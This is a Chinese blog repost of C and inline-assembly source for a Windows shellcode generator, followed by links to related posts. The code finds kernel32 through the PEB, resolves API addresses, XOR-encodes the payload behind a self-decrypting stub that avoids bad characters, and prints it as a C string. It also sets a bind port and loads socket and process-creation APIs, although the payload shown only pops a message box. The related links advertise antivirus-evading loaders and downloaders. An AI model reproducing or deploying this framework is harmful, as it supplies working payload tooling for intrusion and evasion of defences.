使用C语言编写通用shellcode的程序

最新推荐文章于 2023-12-06 19:42:29 发布
最新推荐文章于 2023-12-06 19:42:29 发布
阅读量1.4k 收藏 2
点赞数

/*  
使用C语言编写通用shellcode的程序  
出处:internet  
修改:Hume/冷雨飘心  
测试:Win2K SP4 Local  


*/   
#include <windows.h>   
#include <stdio.h>   
#include <winioctl.h>   


#define  DEBUG 1   


//   
//函数原型   
//   
void     DecryptSc();   
void     ShellCodes();   
void     PrintSc(char *lpBuff, int buffsize);   


//   
//用到的部分定义   
//   
#define  BEGINSTRLEN    0x08    //开始字符串长度   
#define  ENDSTRLEN      0x08    //结束标记字符的长度   
#define  nop_CODE       0x90    //填充字符   
#define  nop_LEN        0x0     //ShellCode起始的填充长度   
#define  BUFFSIZE       0x20000 //输出缓冲区大小   


#define  sc_PORT        7788    //绑定端口号 0x1e6c   
#define  sc_BUFFSIZE    0x2000  //ShellCode缓冲区大小   


#define  Enc_key        0x7A    //编码密钥   


#define  MAX_Enc_Len    0x400   //加密代码的最大长度 1024足够?   
#define  MAX_Sc_Len     0x2000  //hellCode的最大长度 8192足够?   
#define  MAX_api_strlen 0x400   //APIstr字符串的长度   
#define  API_endstr     "strend"//API结尾标记字符串       
#define  API_endstrlen  0x06    //标记字符串长度   


#define PROC_BEGIN __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90   
#define PROC_END PROC_BEGIN   
//---------------------------------------------------   
enum{       //Kernel32   
_CreatePipe,   
_CreateProcessA,   
_CloseHandle,   
_PeekNamedPipe,   
_ReadFile,   
_WriteFile,   
_ExitProcess,   


//WS2_32   
_socket,   
_bind,   
_listen,   
_accept,   
_send,   
_recv,   
_ioctlsocket,   
_closesocket,   


//本机测试User32   
_MessageBeep,   
_MessageBoxA,   
API_num   
};   


//   
//代码这里开始   
//   
int __cdecl main(int argc, char **argv)   
{   
//shellcode中要用到的字符串   
static char ApiStr[]="\x1e\x6c"   //端口地址   


//Kernel32的API函数名称   
"CreatePipe""\x0"   
"CreateProcessA""\x0"   
"CloseHandle""\x0"   
"PeekNamedPipe""\x0"   
"ReadFile""\x0"   
"WriteFile""\x0"   
"ExitProcess""\x0"   


//其它API中用到的API   
"wsock32.dll""\x0"   
"socket""\x0"   
"bind""\x0"   
"listen""\x0"   
"accept""\x0"   
"send""\x0"   
"recv""\x0"   
"ioctlsocket""\x0"   
"closesocket""\x0"   
//本机测试   
"user32.dll""\x0"   
"MessageBeep""\x0"   
"MessageBoxA""\x0"   


"\x0\x0\x0\x0\x0"   
"strend";   


char  *fnbgn_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";  //标记开始的字符串   
char  *fnend_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";  //标记结束的字符串   


char  buff[BUFFSIZE];         //缓冲区   
char  sc_buff[sc_BUFFSIZE];   //ShellCodes缓冲   
char  *pDcrypt_addr,   
*pSc_addr;   


int   buff_len;               //缓冲长度   
int   EncCode_len;            //加密编码代码长度   
int   Sc_len;                 //原始ShellCode的长度   


int       i,k;   
unsigned  char ch;   


//   
//获得DecryptSc()地址,解码函数的地址,然后搜索MAX_Enc_Len字节,查找标记开始的字符串   
//获得真正的解码汇编代码的开始地址,MAX_Enc_Len定义为1024字节一般这已经足够了,然后将这   
//部分代码拷贝入待输出ShellCode的缓冲区准备进一步处理   
//   
pDcrypt_addr=(char *)DecryptSc;   


//定位其实际地址,因为在用Visual Studio生成调试版本调试的情况下,编译器会生成跳转表,   
//从跳转表中要计算得出函数实际所在的地址,这只是为了方便用VC调试   


ch=*pDcrypt_addr;   
if (ch==0xe9)   
{   
pDcrypt_addr++;   
i=*(int *)pDcrypt_addr;   
pDcrypt_addr+=(i+4);      //此时指向函数的实际地址   
}   
//找到解码代码的开始部分   
for(k=0;k<MAX_Enc_Len;++k) if(memcmp(pDcrypt_addr+k,fnbgn_str,BEGINSTRLEN)==0) break;   


if (k<MAX_Enc_Len) pDcrypt_addr+=(k+8);   //如找到定位实际代码的开始   
else    
{   
//显示错误信息   
k=0;   
printf("\nNo Begin str defined in Decrypt function!Please Check before go on...\n");   
return 0;   
}   


for(k=0;k<MAX_Enc_Len;++k) if(memcmp(pDcrypt_addr+k,fnend_str,ENDSTRLEN)==0) break;   


if (k<MAX_Enc_Len) EncCode_len=k;   
else    
{   
k=0;   
printf("\nNo End str defined in Decrypt function!Please Check....\n");   
return 0;   
}   


memset(buff,nop_CODE,BUFFSIZE);                       //缓冲区填充   
memcpy(buff+nop_LEN,pDcrypt_addr,EncCode_len);        //把DecryptSc代码复制进buff   


//   
//处理ShellCode代码,如果需要定位到代码的开始   
//   
pSc_addr=(char *)ShellCodes;     //shellcode的地址   


//调试状态下的函数地址处理,便于调试   
ch=*pSc_addr;   
if (ch==0xe9)   
{   
pSc_addr++;   
i=*(int *)pSc_addr;   
pSc_addr+=(i+4);      //此时指向函数的实际地址   
}   


//如果需要定位到实际ShellCodes()的开始,这个版本中是不需要的   
/*  
for (k=0;k<MAX_Sc_Len ;++k ) if(memcmp(pSc_addr+k,fnbgn_str,BEGINSTRLEN)==0) break;  
if (k<MAX_Enc_Len) pSc_addr+=(k+8);   //如找到定位实际代码的开始  
*/   


//找到shellcode的结尾及长度   
for(k=0;k<MAX_Sc_Len;++k)
{
if(memcmp(pSc_addr+k,fnend_str,ENDSTRLEN)==0)
break;
}
if(k<MAX_Sc_Len)
Sc_len=k;   
else    
{   
k=0;   
printf("\nNo End str defined in ShellCodes function!Please Check....\n");   
return 0;   
}   


//把shellcode代码复制进sc_buff   
memcpy(sc_buff,pSc_addr,Sc_len);   


//把字符串拷贝在shellcode的结尾   
for(i=0;i<MAX_api_strlen;++i)
{
if(memcmp(ApiStr+i,"strend",API_endstrlen)==0)
break;
}
if(i>=MAX_api_strlen)
{   
printf("\nNo End str defined in API strings!Please Check....\n");   
return 0;   
}   
memcpy(sc_buff+k,ApiStr,i);   


Sc_len+=i;        //增加shellcode的长度   


//   
//对shellcode进行编码算法简单,可根据需要改变   
//   
k=EncCode_len+nop_LEN;    //定位缓冲区应存放ShellCode地址的开始   


for(i=0;i<Sc_len;++i){   


ch=sc_buff[i]^Enc_key;   
//对一些可能造成shellcode失效的字符进行替换   
if(ch==0x1f||ch==' '||ch=='.'||ch=='/'||ch=='\\'||ch=='0'||ch=='?'||ch=='%'||ch=='+'||ch==0)
{   
buff[k]='0';  
++k;   
ch+=0x31;   
}   
//把编码过的shellcode放在DecryptSc代码后面   
buff[k]=ch;   
++k;   
}   
buff[k-1]=0;
//shellcode的总长度   
buff_len=k;


//打印出shellcode   
PrintSc(buff,buff_len);   
//buff[buff_len]=0;   
//printf("%s",buff);   


#ifdef DEBUG   
_asm{   
lea eax,buff   
jmp eax   
ret   
}   
#endif   


return  0;   
}   


//解码shellcode的代码   
void  DecryptSc()   
{   
__asm{   


/   
//定义开始标志   
/   
PROC_BEGIN    //C macro to begin proc   


jmp   next   
getEncCodeAddr:   
pop   edi   
push  edi   
pop   esi   
xor   ecx,ecx   
Decrypt_lop:    
lodsb   
cmp  al,cl   
jz   shell   
cmp  al,0x30  //判断是否为特殊字符   
jz   special_char_clean   
store:         
xor  al,Enc_key   
stosb   
jmp  Decrypt_lop   
special_char_clean:      
lodsb   
sub al,0x31   
jmp store   
next:        
call  getEncCodeAddr   
//其余真正加密的shellcode代码会连接在此处   
shell:       


/   
//定义结束标志   
/   
PROC_END      //C macro to end proc   


}   
}            


//   
//shellcode代码   
//   
void ShellCodes()   
{   
//API低址数组       
FARPROC     API[API_num];   


//自己获取的API地址   
FARPROC     GetProcAddr;   
FARPROC    LoadLib;   


HANDLE      hKrnl32;   
HANDLE      libhandle;   


char        *ApiStr_addr,*p;   


int         k;   
u_short     shellcodeport;   


//测试用变量   
char        *testAddr;   


/*  
STARTUPINFO siinfo;  
SOCKET      listenFD,clientFD;  
struct      sockaddr_in server;  
int         iAddrSize = sizeof(server);  
int         lBytesRead;  
PROCESS_INFORMATION ProcessInformation;  
HANDLE      hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;  
SECURITY_ATTRIBUTES sa;  


*/   


_asm {   
jmp    locate_addr0   
getApiStr_addr:   
pop    ApiStr_addr   


//开始获取API的地址以及GetProcAddress和LoadLibraryA的地址   
//以后就可以方便地获取任何API的地址了   


//保护寄存器   
pushad   


xor     esi,esi   
lods    dword ptr fs:[esi]   


Search_Krnl32_lop:   
inc     eax   
je      Krnl32_Base_Ok   
dec     eax   
xchg    esi,eax   
LODSD     
jmp     Search_Krnl32_lop   
Krnl32_Base_Ok:   


LODSD                      
;compare if PE_hdr   
xchg    esi,eax   
find_pe_header:   
dec     esi   
xor     si,si           ;kernel32 is 64kb align   
mov     eax,[esi]   
add     ax,-'ZM'        ;          
jne     find_pe_header   
mov     edi,[esi+3ch]   ;.e_lfanew           
mov     eax,[esi+edi]   
add     eax,-'EP'       ;anti heuristic change this if you are using MASM etc.        
jne     find_pe_header     


push     esi   
;esi=VA Kernel32.BASE   
;edi=RVA K32.pehdr           
mov     ebx,esi   
mov     edi,[ebx+edi+78h]  ;peh.DataDirectory   


push    edi   
push    esi   


mov     eax,[ebx+edi+20h]  ;peexc.AddressOfNames                    
mov     edx,[ebx+edi+24h]  ;peexc.AddressOfNameOrdinals         
call    __getProcAddr   
_emit 0x47   
_emit 0x65   
_emit 0x74   
_emit 0x50   
_emit 0x72   
_emit 0x6F   
_emit 0x63   
_emit 0x41   
_emit 0x64   
_emit 0x64   
_emit 0x72   
_emit 0x65   
_emit 0x73   
_emit 0x73   
_emit 0x0   
//db     "GetProcAddress",0   
__getProcAddr:   
pop     edi   
mov     ecx,15           
sub     eax,4   
next_:           
add     eax,4   
add     edi,ecx   
sub     edi,15   
mov     esi,[ebx+eax]   
add     esi,ebx   
mov     ecx,15   
repz    cmpsb   
jnz     next_   


pop     esi   
pop     edi   


sub     eax,[ebx+edi+20h]      ;peexc.AddressOfNames   
shr     eax,1   
add     edx,ebx   
movzx   eax,word ptr [edx+eax]           
add     esi,[ebx+edi+1ch]       ;peexc.AddressOfFunctions   
add     ebx,[esi+eax*4]         ;ebx=Kernel32.GetProcAddress.addr   
;use GetProcAddress and hModule to get other func   
pop     esi                     ;esi=kernel32 Base   


mov     [hKrnl32],esi           //保存   
mov     [GetProcAddr],ebx       //保存   


call    _getLoadLib   
_emit 0x4C   
_emit 0x6F   
_emit 0x61   
_emit 0x64   
_emit 0x4C   
_emit 0x69   
_emit 0x62   
_emit 0x72   
_emit 0x61   
_emit 0x72   
_emit 0x79   
_emit 0x41   
_emit 0x0   
//db      "LoadLibraryA",0   


_getLoadLib:   
push    esi   
call    ebx   
mov     [LoadLib],eax   


//恢复寄存器,避免更多问题   
popad   
}   


//取出定义的端口地址   
shellcodeport=*(u_short *)ApiStr_addr;   
ApiStr_addr+=2;   


测试用   
testAddr=ApiStr_addr;   
  


//利用GetProcAddress来获得shellcode中所用到的API地址   


libhandle=hKrnl32;   
p=ApiStr_addr;   


k=0;   
///*   
while ( *((unsigned int *)p) != 0)   
{   
ApiStr_addr=p;   
while(*p) p++;   //前进到下一个字符串   


if (*( (unsigned int *)(p-4))=='lld.')   
{   
libhandle=(HANDLE)LoadLib(ApiStr_addr);  //若为DLL则加载DLL   
}   
else   
{   
API[k]=(FARPROC)GetProcAddr(libhandle,ApiStr_addr);   
k++;   
}   


ApiStr_addr=++p; //更新指针前进一个字符位置   


}   


//*/   


///   
//         下面就可以使用C语言来编写真正实现功能的shellcode了                //   
///   
//   
//简单测试几个API看是否复合要求   
//   
API[_MessageBeep](0x10);   
API[_MessageBoxA](0,testAddr,0,0x40);
API[_ExitProcess](0);
///   
//                           shellcode功能部分结束                       //   
///   


//死循环   
die:      
goto die;   
__asm   
{   
locate_addr0:     
call getApiStr_addr      //5 bytes   
//真正的字符串数据要连接在此处   


/   
//定义结束标志   
/   
PROC_END      //C macro to end proc   


}   
}   


//   
//显示打印生成的shellcode的C string格式代码   
//   
void PrintSc(char *lpBuff, int buffsize)   
{   
int i=1,j=2;   
char *p;   
char msg[5];   
for(i=0;i<buffsize;i++)   
{   
if((i%16)==0)
{
if(i!=0)
printf("\"\n\"");
else   
printf("\"");

sprintf(msg,"\\x%.2X",lpBuff[i]&0xff);   
for( p = msg, j=0; j<4; p++, j++ )   
{   
if(isupper(*p))
printf("%c", _tolower(*p));   
else   
printf("%c", p[0]);   
}   
}   
printf("\";\n/*Shell total are %d bytes */\n",buffsize);   
}

Eric6_17
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
NimShellCodeLoader:使用nim编写shellcode加载器
02-03
Nim编写Windows平台shellcode免杀加载器 快速生成免杀毒性文件 更新: 20210123:增加三种加载shellcode方式,其中两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:...
C/C++ 通用ShellCode编写与调用
CSDN
09-23 6048
首先,我们的ShellCode代码需要自定位,因为我们的代码并不是一个完整的EXE可执行程序,他没有导入表无法定位到当前系统中每个函数的虚拟地址,所以我们直接获取到Kernel32.dll的基地址,里面的GetProcAddr这个函数,获取的方式有很多,第一种是暴力搜索,第二种通过遍历进程的TEB结构来实现,我们使用第二种方式尝试,一旦获取到该函数,就可以动态的调用任何想要的函数了。
1.8 运用C编写ShellCode代码
CSDN
08-30 6217
在笔者前几篇文章中,我们使用汇编语言并通过自定位的方法实现了一个简单的`MessageBox`弹窗功能,但由于汇编语言过于繁琐在编写效率上不仅要考验开发者的底层功底,还需要写出更多的指令集,这对于普通人来说是非常困难的,当然除了通过汇编来实现`ShellCode`的编写以外,使用C同样可以实现编写,在多数情况下读者可以直接使用C开发,只有某些环境下对ShellCode条件有极为苛刻的长度限制时才会考虑使用汇编。
C/C++ 实现ShellCode编写与提取
CSDN
07-16 8732
简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。使用 Release 模式写代码,这是因为 Debug 模式下的代码在转换成汇编后首先都是一个 jmp,然后再跳到我们的功能代码处,但 jmp 指令是 “地址相关” 的 ,所以在转换成 shellcode 时就会出错!简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。这就是我们需要的 ShellCode 了 (o゚v゚)ノ。
C语言写的shellcode
03-05
C语言写的开端口的shellcode 打开9878端口的ShellCode源代码
cpp-使用纯CC编写ShellCode生成框架
08-16
使用纯C/C 编写ShellCode生成框架
使用UnicornFramework和ProcessDump仿真环境编写Shellcode模拟器.zip
03-21
使用UnicornFramework和ProcessDump仿真环境编写Shellcode模拟器
基于C++ shellcode及植入目标程序【100011896】
04-12
二是向目标程序植入shellcode。植入过程主要分为两步:检验当前文件是否为PE文件,是否已被感染 (参照judgePE函数);将shellcode植入目标节,并依据PE文件格式,进行相关参数的修改(参照infect函数)。
运用C编写ShellCode代码教程
蓝易云
08-12 205
以上是一个简单的教程,介绍了使用C语言编写ShellCode的基本步骤。由于ShellCode的复杂性和潜在的危险性,建议只在合法和授权的环境中进行相关实验和研究。请谨慎行事,并确保你对相关技术和法律的了解。需要注意的是,编写使用ShellCode涉及到计算机安全的领域,需要遵循合法和道德的原则。在进行ShellCode开发和使用之前,请确保你有合适的授权和法律许可,并遵守相关法律和规定。编写ShellCode是一项高级技术,需要深入了解计算机体系结构和操作系统底层原理。
【笔记】使用C语言编写win32平台Shellcode
LemonLENG的博客
06-08 556
转自:http://www.tuicool.com/articles/eMJfaea — Pwn150 Word2003部分 例子: /* void *get_kernel32_base() { __asm { push ebp xor ecx,ecx mov esi,fs:0x30 ;        //fs:30为PEB指针 mov esi, [esi + 0x0C
无dll插入进程,下载者vc源代码
u010488395的专栏
05-06 667
无dll插入进程,下载者vc源代码 增加代码xor解密功能,以逃过杀毒软件. 生成mini下载者,则需要自己做一个工具了.读懂代码,把相应的部份加密即可. 参考delphi版本的下载者源代码,编出来有16k左右。压缩也有10k多, 于是写了vc的代码。按以下的设置,编译出来2k左右。 还可以可以再设置一下编译开关,以减小体积。 ps:原代码中4处没有对\转义,以下代码编译通过; 编译
C语言实现shellcode通用框架二:文件下载执行或内存加载
yan_star的博客
01-21 1106
简介: 承接接上篇。上篇(C语言实现shellcode通用框架一:解密执行)我们的第二层shellcode核心代码都是事先加密好嵌套在第一层shellcode中,核心代码更新起来不方便。所以联网更新显得尤为重要。大家可以选择内存加载,这样可以避免落地被杀软查杀,也可以选择落地,随意选择,思想和代码很重要。其实,这篇介绍的shellcode框架代码和上篇大同小异,无非是API、动态库多了一些,代码量有所变大,但是核心思想,代码逻辑还是一样的。开下源,希望对大家学习有所帮助。关于内存加载那块我注释并标出了,使
探索C语言中的Shellcode从提取到执行
最新发布
CSDN
12-06 4190
Shellcode是一种独立于应用程序的机器代码,通常用于实现特定任务,如执行远程命令、注入恶意软件或利用系统漏洞。在网络安全领域,研究Shellcode是理解恶意软件和提高系统安全性的关键一环。本文将深入探讨如何在C语言中提取Shellcode,并通过XOR加密技术增加其混淆程度。最后,我们将演示如何将Shellcode写入文件并在内存中执行。
演示几种用c语言来执行shellcode(其实也就是机器码)的方式,shellcode(示例代码)
weixin_36200896的博客
05-24 811
简介这篇文章主要介绍了shellcode(示例代码)以及相关的经验技巧,文章约1446字,浏览量241,点赞数8,值得推荐!/** 作者: 冷却* 时间: 2009年2月21日* E-mail: [email protected]* 描述: 演示几种用C语言来执行shellcode(其实也就是机器码)的方式* 备注:在WindowsXP SP3下测试成功*///一段打开Windo...
linux c语言shellcode,二进制入门-打造Linux shellcode基础篇
weixin_42412939的博客
05-12 517
0x01 前言本文的目的不是为了介绍如何进行恶意的破坏性活动,而是为了教会你如何去防御此类破坏性活动,以帮助你扩大知识范围,完善自己的技能,如有读者运用本文所学技术从事破坏性活动,本人概不负责。0x02 什么是Shellcodeshellcode是用作利用软件漏洞的有效载荷的一小段代码,因为它通常启动一个命令shell,攻击者可以从中控制受攻击的机器,所以称他为shellcode。但是任何执行类似...
C语言执行shellcode的五种方法
热门推荐
云守护的专栏
05-30 1万+
//C语言执行shellcode的五种方法 #include #include //data段可读写 #pragma comment(linker, "/section:.data,RWE") //不显示窗口 #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") #pragma comment
使用C编译器编写shellcode
Tody Guo的专栏
12-08 1469
原文出处: Nick Harbour   译文出处: IDF徐文博 背景 有时候程序员们需要写一段独立于位置操作的代码,可当作一段数据写到其他进程或者网络中去。该类型代码在它诞生之初就被称为shellcode,在软件利用中黑客们以此获取到shell权限。方法就是通过这样或那样的恶意手法使得这段代码得以执行,完成它的使命。当然了,该代码仅能靠它自己,作者无法使用现代软件开发的实践来推
使用shellcode编写printf("abc")
05-20
下面是一个使用shellcode编写printf("abc")的示例代码: ```assembly section .data msg db "abc",0x0a,0x00 ; 存储输出字符串 section .text global _start _start: ; 调用printf函数输出字符串 ; 将字符串...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值